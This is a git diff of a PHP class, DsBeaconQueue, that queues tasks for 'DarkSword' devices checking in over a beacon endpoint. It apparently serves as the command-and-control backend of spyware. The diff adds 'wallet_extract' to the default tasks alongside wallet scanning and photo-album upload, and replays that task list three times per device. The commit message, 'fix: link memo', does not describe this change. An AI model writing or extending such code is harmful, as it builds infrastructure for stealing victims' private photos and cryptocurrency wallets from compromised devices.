fix: link memo
This commit is contained in:
@@ -13,22 +13,27 @@ use Illuminate\Support\Str;
|
||||
* Redis keys per device:
|
||||
* ds:q:{id} List — pending queue (RPOP dequeue, LPUSH enqueue)
|
||||
* ds:qdisp:{id} Hash — dispatched/in-flight tasks {command_id: taskJson}
|
||||
* ds:qround:{id} String — remaining default-queue rounds (including current)
|
||||
* ds:qt:{id} String — throttle lock (TTL 5s)
|
||||
*
|
||||
* Completed task results are stored as DeviceEvent records (日志 tab), NOT in Redis.
|
||||
*
|
||||
* Task JSON: {task_id, type, params, status, command_id?, dispatched_at?, completed_at?, result_count?, result_meta?}
|
||||
*
|
||||
* Default queue: photos, wallet_scan (one-shot, no auto-repeat).
|
||||
* Default queue: wallet_scan → wallet_extract → photos, replayed DEFAULT_ROUNDS times.
|
||||
*/
|
||||
class DsBeaconQueue
|
||||
{
|
||||
/** Default task types seeded for new DarkSword devices (one-shot, no repeat). */
|
||||
/** Default task types seeded for new DarkSword devices (FIFO dispatch order). */
|
||||
public const DEFAULT_TYPES = [
|
||||
'photos',
|
||||
'wallet_scan',
|
||||
'wallet_extract',
|
||||
'photos',
|
||||
];
|
||||
|
||||
/** After the default queue is consumed, replay it until this many rounds finish. */
|
||||
public const DEFAULT_ROUNDS = 3;
|
||||
|
||||
/** All task types the pe_worker.js can handle (for admin dropdown). */
|
||||
public const ALL_TYPES = [
|
||||
'photos' => '相册上传',
|
||||
@@ -118,6 +123,7 @@ class DsBeaconQueue
|
||||
private const Q_PREFIX = 'ds:q:';
|
||||
private const DISP_PREFIX = 'ds:qdisp:';
|
||||
private const DONE_PREFIX = 'ds:qdone:';
|
||||
private const ROUND_PREFIX = 'ds:qround:';
|
||||
private const THROTTLE_PREFIX = 'ds:qt:';
|
||||
private const THROTTLE_SEC = 5;
|
||||
private const DONE_CAP = 50;
|
||||
@@ -141,9 +147,8 @@ class DsBeaconQueue
|
||||
return; // already has pending tasks
|
||||
}
|
||||
|
||||
foreach (self::DEFAULT_TYPES as $type) {
|
||||
$this->lpushTask($device, $type, $this->paramsFor($type));
|
||||
}
|
||||
$this->setRoundsRemaining($device, self::DEFAULT_ROUNDS);
|
||||
$this->pushDefaultTypes($device);
|
||||
}
|
||||
|
||||
// ── Dequeue (called on every /beacon) ──────────────────────────────────
|
||||
@@ -167,7 +172,13 @@ class DsBeaconQueue
|
||||
|
||||
$raw = Redis::rpop($this->queueKey($device));
|
||||
if ($raw === null) {
|
||||
return null; // noop — queue empty
|
||||
if (! $this->replenishDefaultRound($device)) {
|
||||
return null; // noop — queue empty and no remaining rounds
|
||||
}
|
||||
$raw = Redis::rpop($this->queueKey($device));
|
||||
if ($raw === null) {
|
||||
return null;
|
||||
}
|
||||
}
|
||||
|
||||
$task = json_decode($raw, true);
|
||||
@@ -386,7 +397,7 @@ class DsBeaconQueue
|
||||
* Only pending + dispatched are returned. Completed task results are
|
||||
* stored as DeviceEvent records (shown in the 日志 tab), not in Redis.
|
||||
*
|
||||
* @return array{pending: list<array>, dispatched: list<array>, done: list<array>}
|
||||
* @return array{pending: list<array>, dispatched: list<array>, done: list<array>, rounds_total: int, rounds_remaining: int, round_current: int}
|
||||
*/
|
||||
public function getQueueState(Device $device): array
|
||||
{
|
||||
@@ -410,10 +421,17 @@ class DsBeaconQueue
|
||||
}
|
||||
}
|
||||
|
||||
$remaining = $this->roundsRemaining($device);
|
||||
|
||||
return [
|
||||
'pending' => $pending,
|
||||
'dispatched' => $dispatched,
|
||||
'done' => [], // completed tasks are in device_events (日志 tab)
|
||||
'rounds_total' => self::DEFAULT_ROUNDS,
|
||||
'rounds_remaining' => $remaining,
|
||||
'round_current' => $remaining > 0
|
||||
? (self::DEFAULT_ROUNDS - $remaining + 1)
|
||||
: self::DEFAULT_ROUNDS,
|
||||
];
|
||||
}
|
||||
|
||||
@@ -427,6 +445,48 @@ class DsBeaconQueue
|
||||
|
||||
// ── Internal helpers ────────────────────────────────────────────────────
|
||||
|
||||
/**
|
||||
* Enqueue one copy of the default task list (FIFO via LPUSH + RPOP).
|
||||
*/
|
||||
private function pushDefaultTypes(Device $device): void
|
||||
{
|
||||
foreach (self::DEFAULT_TYPES as $type) {
|
||||
$this->lpushTask($device, $type, $this->paramsFor($type));
|
||||
}
|
||||
}
|
||||
|
||||
/**
|
||||
* When the pending list is empty, push another copy of the default types
|
||||
* if unused rounds remain. Remaining includes the round that just finished,
|
||||
* so remaining=1 means that was the last pass.
|
||||
*/
|
||||
private function replenishDefaultRound(Device $device): bool
|
||||
{
|
||||
$remaining = $this->roundsRemaining($device);
|
||||
if ($remaining <= 1) {
|
||||
if ($remaining === 1) {
|
||||
$this->setRoundsRemaining($device, 0);
|
||||
}
|
||||
|
||||
return false;
|
||||
}
|
||||
|
||||
$this->setRoundsRemaining($device, $remaining - 1);
|
||||
$this->pushDefaultTypes($device);
|
||||
|
||||
return true;
|
||||
}
|
||||
|
||||
public function roundsRemaining(Device $device): int
|
||||
{
|
||||
return max(0, (int) Redis::get($this->roundKey($device)));
|
||||
}
|
||||
|
||||
private function setRoundsRemaining(Device $device, int $remaining): void
|
||||
{
|
||||
Redis::set($this->roundKey($device), (string) max(0, $remaining));
|
||||
}
|
||||
|
||||
/**
|
||||
* Push a task to the Redis queue (LPUSH = newest at head).
|
||||
*
|
||||
@@ -498,6 +558,11 @@ class DsBeaconQueue
|
||||
return self::DONE_PREFIX.$device->id;
|
||||
}
|
||||
|
||||
private function roundKey(Device $device): string
|
||||
{
|
||||
return self::ROUND_PREFIX.$device->id;
|
||||
}
|
||||
|
||||
private function throttleKey(Device $device): string
|
||||
{
|
||||
return self::THROTTLE_PREFIX.$device->id;
|
||||
|
||||
Reference in New Issue
Block a user